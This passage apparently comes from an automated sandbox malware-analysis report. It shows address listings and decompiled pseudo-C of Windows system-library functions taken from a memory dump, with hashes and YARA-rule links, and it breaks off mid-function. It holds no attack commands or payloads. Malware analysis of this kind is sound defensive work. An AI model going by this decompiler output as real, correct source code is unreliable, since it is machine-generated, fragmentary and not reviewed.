                                                          0x0348fa8f
                                                          0x0348fa91
                                                          0x0348fa97
                                                          0x0348fa9d
                                                          0x0348faa4
                                                          0x0348faaa
                                                          0x0348faaf
                                                          0x0348fab1
                                                          0x0348fac3
                                                          0x0348fab3
                                                          0x0348fabc
                                                          0x0348fabc
                                                          0x0348fac8
                                                          0x0348facb
                                                          0x0348fadf
                                                          0x0348fadf
                                                          0x0348facb
                                                          0x0348faa4
                                                          0x0348fa91
                                                          0x03432e6f
                                                          0x03432e6f
                                                          0x03432e5f
                                                          0x0348fa13
                                                          0x0348fa15
                                                          0x0348fa17
                                                          0x0348fa1f
                                                          0x0348fa21
                                                          0x0348fa22
                                                          0x0348fa25
                                                          0x0348fa28
                                                          0x0348fa2f
                                                          0x0348fa2f
                                                          0x0348fa2a
                                                          0x0348fa2a
                                                          0x0348fa2a
                                                          0x0348fa31
                                                          0x0348fa34
                                                          0x0348fa36
                                                          0x0348fa3c
                                                          0x0348fa3e
                                                          0x0348fa41
                                                          0x0348fa43
                                                          0x0348fa45
                                                          0x0348fa45
                                                          0x0348fa41
                                                          0x0348fa3c
                                                          0x0348fa4a
                                                          0x0348fa4f
                                                          0x0348fa51
                                                          0x0348fa53
                                                          0x0348fa56
                                                          0x0348fa5b
                                                          0x0348fa5e
                                                          0x00000000
                                                          0x0348fa5e
                                                          0x03432e23

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Re-Waiting
                                                          • API String ID: 0-316354757
                                                          • Opcode ID: 75a1d3237437e6462750ddf6a22a042cbb9836b60ca1b8fe29e8d4837a354d6c
                                                          • Instruction ID: 557b892a3c385d12ef4a57fb41ee12f495f0cb23706666652d5f0efcdd13dddd
                                                          • Opcode Fuzzy Hash: 75a1d3237437e6462750ddf6a22a042cbb9836b60ca1b8fe29e8d4837a354d6c
                                                          • Instruction Fuzzy Hash: 08614A31A017449FDB31EF68D841BBFB7A5EB4A720F18059BD4119F3C0C77499458799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03500EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E03500EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E034FFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03501074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03479730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E034FA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E034FA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3528b04 >> 0x14) + (_v44 -  *0x3528b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03457D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E034F138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03457D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E034EFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3528724 & 0x00000008) != 0) {
						E034F52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E035015B5(0x3528ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                          0x03500eb7
                                                          0x03500eb9
                                                          0x03500ec0
                                                          0x03500ec2
                                                          0x03500ecd
                                                          0x0350105b
                                                          0x0350105b
                                                          0x03501061
                                                          0x03501066
                                                          0x03501066
                                                          0x0350106b
                                                          0x03501073
                                                          0x03501073
                                                          0x03500ed3
                                                          0x03500ed6
                                                          0x03500edc
                                                          0x03500ee0
                                                          0x03500ee7
                                                          0x03500ef0
                                                          0x03500ef5
                                                          0x03500efa
                                                          0x03500efc
                                                          0x03500efd
                                                          0x03500f03
                                                          0x03500f04
                                                          0x03500f06
                                                          0x03500f07
                                                          0x03500f09
                                                          0x03500f0e
                                                          0x03500f14
                                                          0x03500f23
                                                          0x03500f2d
                                                          0x03500f34
                                                          0x03500f34
                                                          0x03500f14
                                                          0x03500f52
                                                          0x00000000
                                                          0x00000000
                                                          0x03500f58
                                                          0x03500f73
                                                          0x03500f74
                                                          0x03500f79
                                                          0x03500f7d
                                                          0x03500f80
                                                          0x03500f86
                                                          0x03500fab
                                                          0x03500fb5
                                                          0x03500fc6
                                                          0x03500fd1
                                                          0x03500fe3
                                                          0x03500fd3
                                                          0x03500fdc
                                                          0x03500fdc
                                                          0x03500feb
                                                          0x03501009
                                                          0x03501009
                                                          0x03501015
                                                          0x03501027
                                                          0x03501017
                                                          0x03501020
                                                          0x03501020
                                                          0x0350102f
                                                          0x0350103c
                                                          0x0350103c
                                                          0x03501048
                                                          0x03501050
                                                          0x03501050
                                                          0x03501055
                                                          0x00000000
                                                          0x03501055
                                                          0x03500f88
                                                          0x03500f9e
                                                          0x03500fa2
                                                          0x03500fa9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03500fa9
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 5c2be9fca4fe8bc073d889e16cf8972444ec4520d05ad33eac63f1a87b201ff6
                                                          • Instruction ID: 4698dee0838ecf07f966f7b2d3ca2ff12b82e5621443fa627fdad5b28d4d3217
                                                          • Opcode Fuzzy Hash: 5c2be9fca4fe8bc073d889e16cf8972444ec4520d05ad33eac63f1a87b201ff6
                                                          • Instruction Fuzzy Hash: 8851AD752047819FD325DF2AE990B1BB7E5FBC4314F08092DF9968B2E0D672E905CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E0346F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03454120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03479830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03479990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E034795D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xfd1eb81a
							_t109 = L03454620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2002fd1e
								E0347F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2002fd1e
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E034795D0();
										L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                          0x0346f0d3
                                                          0x0346f0d9
                                                          0x0346f0e0
                                                          0x0346f0e7
                                                          0x0346f0f2
                                                          0x0346f0f4
                                                          0x0346f0f8
                                                          0x0346f100
                                                          0x0346f108
                                                          0x0346f10d
                                                          0x0346f115
                                                          0x0346f116
                                                          0x0346f11f
                                                          0x0346f123
                                                          0x0346f124
                                                          0x0346f12c
                                                          0x0346f130
                                                          0x0346f134
                                                          0x0346f13d
                                                          0x0346f144
                                                          0x0346f14b
                                                          0x0346f152
                                                          0x034abab0
                                                          0x034abab0
                                                          0x0346f158
                                                          0x0346f158
                                                          0x0346f15a
                                                          0x0346f160
                                                          0x0346f165
                                                          0x0346f166
                                                          0x0346f16f
                                                          0x0346f173
                                                          0x034abaa7
                                                          0x034abaa7
                                                          0x034abaab
                                                          0x00000000
                                                          0x0346f179
                                                          0x0346f179
                                                          0x0346f18d
                                                          0x0346f191
                                                          0x034abaa2
                                                          0x00000000
                                                          0x0346f197
                                                          0x0346f19b
                                                          0x0346f1a2
                                                          0x0346f1a9
                                                          0x0346f1af
                                                          0x0346f1b2
                                                          0x0346f1b6
                                                          0x0346f1b9
                                                          0x0346f1c0
                                                          0x0346f1c4
                                                          0x0346f1d8
                                                          0x0346f1df
                                                          0x0346f1e3
                                                          0x0346f1e6
                                                          0x0346f1eb
                                                          0x0346f1ee
                                                          0x0346f1f4
                                                          0x0346f20f
                                                          0x034abab7
                                                          0x034ababb
                                                          0x034abacc
                                                          0x034abad1
                                                          0x0346f215
                                                          0x0346f218
                                                          0x0346f226
                                                          0x0346f22b
                                                          0x00000000
                                                          0x0346f22b
                                                          0x0346f1f6
                                                          0x0346f1f6
                                                          0x0346f1f9
                                                          0x0346f1fb
                                                          0x0346f1fb
                                                          0x0346f1f4
                                                          0x0346f191
                                                          0x0346f173
                                                          0x0346f152
                                                          0x0346f203

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                          • Instruction ID: 4c0180ba443fd9e3eb787856698e3f3aee4451ba1411944ee512e6581d75ce6d
                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                          • Instruction Fuzzy Hash: 96519D75505710AFC320DF29C840A6BBBF8FF48750F00892EF9A68B690E7B4E944CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E034B3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x352d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03470BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E034B3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0347FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E034B3540;
						E0347FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0348DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E034C0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E034797C0();
					}
					return E0347B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E034B3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E034B3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0347FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03479650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E034B3787(_a4,  &_v352, _t80);
						}
					}
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E034795D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                          0x034b3552
                                                          0x034b355a
                                                          0x034b355d
                                                          0x034b3566
                                                          0x034b3567
                                                          0x034b357e
                                                          0x034b358f
                                                          0x034b35a1
                                                          0x034b35a5
                                                          0x034b366b
                                                          0x034b366b
                                                          0x034b366d
                                                          0x034b3672
                                                          0x034b3679
                                                          0x034b3685
                                                          0x034b368d
                                                          0x034b369d
                                                          0x034b36a7
                                                          0x034b36b8
                                                          0x034b36c6
                                                          0x034b36c7
                                                          0x034b36dc
                                                          0x034b36e1
                                                          0x034b36e7
                                                          0x034b36e9
                                                          0x034b36e9
                                                          0x034b3703
                                                          0x034b3703
                                                          0x034b35b5
                                                          0x034b35c0
                                                          0x034b35c4
                                                          0x00000000
                                                          0x00000000
                                                          0x034b35ca
                                                          0x034b35d7
                                                          0x034b35e2
                                                          0x034b35e6
                                                          0x034b35e8
                                                          0x034b35f5
                                                          0x034b35fa
                                                          0x034b3603
                                                          0x034b3604
                                                          0x034b3609
                                                          0x034b360a
                                                          0x034b3612
                                                          0x034b3613
                                                          0x034b361e
                                                          0x034b3622
                                                          0x034b3628
                                                          0x034b362f
                                                          0x034b362f
                                                          0x034b3636
                                                          0x034b3638
                                                          0x034b363b
                                                          0x034b3642
                                                          0x034b3642
                                                          0x034b3636
                                                          0x034b3657
                                                          0x034b3657
                                                          0x034b365c
                                                          0x034b3662
                                                          0x034b3669
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: BinaryHash
                                                          • API String ID: 2994545307-2202222882
                                                          • Opcode ID: cf9350f608f5fc6033f70b541e85f27e3a2cc47676a4f7f33b6e6df647a961c1
                                                          • Instruction ID: fad8e93624e76bd33ddc6df335266a75b2a67eee50b7dc866a133b829b7c7830
                                                          • Opcode Fuzzy Hash: cf9350f608f5fc6033f70b541e85f27e3a2cc47676a4f7f33b6e6df647a961c1
                                                          • Instruction Fuzzy Hash: E04139B5D0162C9FDB61DE51CC84FDEB77C9B44714F0045AAE609AF250DB305E888FA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E034B3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03479650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03454620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03479650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                          0x034b3893
                                                          0x034b3896
                                                          0x034b3899
                                                          0x034b389f
                                                          0x034b38a0
                                                          0x034b38a4
                                                          0x034b38a9
                                                          0x034b38ac
                                                          0x034b38ad
                                                          0x034b38ae
                                                          0x034b38af
                                                          0x034b38b1
                                                          0x034b38b4
                                                          0x034b38bb
                                                          0x034b38bc
                                                          0x034b38bd
                                                          0x034b38c4
                                                          0x034b38c8
                                                          0x034b38ca
                                                          0x034b38ca
                                                          0x034b38d5
                                                          0x034b393e
                                                          0x034b3940
                                                          0x034b3942
                                                          0x034b3952
                                                          0x034b3954
                                                          0x034b3961
                                                          0x034b3961
                                                          0x034b3967
                                                          0x034b396e
                                                          0x034b396e
                                                          0x034b3947
                                                          0x034b394c
                                                          0x00000000
                                                          0x034b394c
                                                          0x034b38ea
                                                          0x034b38ee
                                                          0x034b38f8
                                                          0x034b38f9
                                                          0x034b38ff
                                                          0x034b3900
                                                          0x034b3902
                                                          0x034b3903
                                                          0x034b390b
                                                          0x034b390f
                                                          0x034b3950
                                                          0x00000000
                                                          0x034b3950
                                                          0x034b3915
                                                          0x034b391d
                                                          0x034b391d
                                                          0x034b3922
                                                          0x034b3926
                                                          0x00000000
                                                          0x034b3928
                                                          0x034b392b
                                                          0x034b392b
                                                          0x034b3935
                                                          0x034b3937
                                                          0x034b3937
                                                          0x00000000
                                                          0x034b3935
                                                          0x034b3926
                                                          0x034b38f0
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: BinaryName
                                                          • API String ID: 2994545307-215506332
                                                          • Opcode ID: 5700da1cd06bdc0362c39d108ebea7ec472bffb89a5ae49428799279d9080f46
                                                          • Instruction ID: a420325af133f0060eb4f31748017c6e7ab77f9f1b3616ab4914c6d9bcabd8c1
                                                          • Opcode Fuzzy Hash: 5700da1cd06bdc0362c39d108ebea7ec472bffb89a5ae49428799279d9080f46
                                                          • Instruction Fuzzy Hash: 6E31F43AD00619BFEB25DE5AC945EABF778EB40B20F01416AE814AF350D7309E00CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 33%
                                                          			E0346D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x352d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03454120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0347B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E034798D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E034795D0();
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                          0x0346d29c
                                                          0x0346d2a6
                                                          0x0346d2b1
                                                          0x0346d2b5
                                                          0x0346d2b6
                                                          0x0346d2bc
                                                          0x0346d2bd
                                                          0x0346d2be
                                                          0x0346d2bf
                                                          0x0346d2c2
                                                          0x0346d2c4
                                                          0x0346d2cc
                                                          0x0346d384
                                                          0x0346d34b
                                                          0x0346d34f
                                                          0x0346d350
                                                          0x0346d351
                                                          0x0346d35c
                                                          0x0346d35c
                                                          0x0346d2d6
                                                          0x0346d2da
                                                          0x0346d2e1
                                                          0x0346d361
                                                          0x0346d369
                                                          0x0346d36d
                                                          0x0346d2e3
                                                          0x0346d2e3
                                                          0x0346d2e3
                                                          0x0346d2e5
                                                          0x0346d2ed
                                                          0x0346d2f5
                                                          0x0346d2fa
                                                          0x0346d302
                                                          0x0346d303
                                                          0x0346d30b
                                                          0x0346d30f
                                                          0x0346d313
                                                          0x0346d318
                                                          0x0346d31c
                                                          0x0346d320
                                                          0x0346d379
                                                          0x0346d37d
                                                          0x00000000
                                                          0x00000000
                                                          0x034aaffe
                                                          0x034ab001
                                                          0x034ab011
                                                          0x00000000
                                                          0x0346d322
                                                          0x0346d322
                                                          0x0346d330
                                                          0x0346d337
                                                          0x0346d35d
                                                          0x0346d339
                                                          0x0346d33f
                                                          0x0346d38c
                                                          0x0346d38c
                                                          0x0346d33f
                                                          0x0346d349
                                                          0x00000000
                                                          0x0346d349

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: efb3de08fb257abb3392075e51db9c0b22c2c1f7ffb67df5b2ac191865da3026
                                                          • Instruction ID: 98880a64ee61e72707c77b5b65c760fc2dd21f06d66d45e6a31ef33d7f98e012
                                                          • Opcode Fuzzy Hash: efb3de08fb257abb3392075e51db9c0b22c2c1f7ffb67df5b2ac191865da3026
                                                          • Instruction Fuzzy Hash: 7531B3B5A083059FC320DF29C98096FBBE8EBC6654F04092FF9958B210D634DD45CB9B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03441B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E03441B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0347BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0347A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
